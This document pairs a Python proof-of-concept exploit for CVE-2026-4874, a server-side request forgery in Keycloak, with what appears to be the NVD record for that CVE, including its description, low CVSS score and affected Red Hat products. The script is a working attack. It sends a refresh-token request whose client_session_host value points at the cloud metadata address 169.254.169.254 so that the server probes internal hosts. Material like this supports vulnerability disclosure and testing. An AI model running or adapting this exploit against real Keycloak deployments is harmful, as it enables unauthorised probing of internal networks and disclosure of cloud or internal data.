CVE-2026-4874

# PoC for CVE-2026-4874: Keycloak SSRF via client_session_host # This script demonstrates how an authenticated attacker can manipulate the # client_session_host parameter during a refresh token request to trigger an SSRF. import requests # Configuration TARGET_HOST = "https://keycloak.example.com" REALM = "master" CLIENT_ID = "admin-cli" # Attacker's valid refresh token (obtained after login) REFRESH_TOKEN = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." # Internal target to probe (e.g., AWS metadata, internal admin panel) SSRF_PAYLOAD = "http://169.254.169.254/latest/meta-data/" def exploit_ssrf(): url = f"{TARGET_HOST}/realms/{REALM}/protocol/openid-connect/token" headers = { "Content-Type": "application/x-www-form-urlencoded" } # Exploit payload: The vulnerable parameter client_session_host data = { "grant_type": "refresh_token", "client_id": CLIENT_ID, "refresh_token": REFRESH_TOKEN, "client_session_host": SSRF_PAYLOAD # Malicious internal URL } print(f"[*] Sending SSRF request to {url}...") print(f"[*] Targeting internal host: {SSRF_PAYLOAD}") try: response = requests.post(url, headers=headers, data=data, verify=False) if response.status_code == 200: print("[+] Request sent successfully. Check internal logs or response timing for indication of success.") else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": exploit_ssrf()

{"cve": {"id": "CVE-2026-4874", "sourceIdentifier": "[email protected]", "published": "2026-03-26T08:16:22.700", "lastModified": "2026-04-01T14:11:28.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. An authenticated attacker can perform Server-Side Request Forgery (SSRF) by manipulating the `client_session_host` parameter during refresh token requests. This occurs when a Keycloak client is configured to use the `backchannel.logout.url` with the `application.session.host` placeholder. Successful exploitation allows the attacker to make HTTP requests from the Keycloak server’s network context, potentially probing internal networks or internal APIs, leading to information disclosure."}, {"lang": "es", "value": "Se encontró una vulnerabilidad en Keycloak. Un atacante autenticado puede realizar falsificación de petición del lado del servidor (SSRF) manipulando el parámetro 'client_session_host' durante las peticiones de token de actualización. Esto ocurre cuando un cliente de Keycloak está configurado para usar la 'backchannel.logout.url' con el marcador de posición 'application.session.host'. La explotación exitosa permite al atacante realizar peticiones HTTP desde el contexto de red del servidor de Keycloak, potencialmente sondeando redes internas o APIs internas, lo que lleva a la revelación de información."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_keycloak:-:*:*:*:-:*:*:*", "matchCriteriaId": "E5C930CB-4EAD-497B-A44B-D880F2A1F85B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "0D8BC03A-4198-4488-946B-3F6B43962942"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform_expansion_pack:-:*:*:*:*:*:*:*", "matchCriteriaId": "0A24CBFB-4900-47A5-88D2-A44C929603DC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:single_sign-on:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "9EFEC7CA-8DDA-48A6-A7B6-1F1D14792890"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-4874", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451611", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}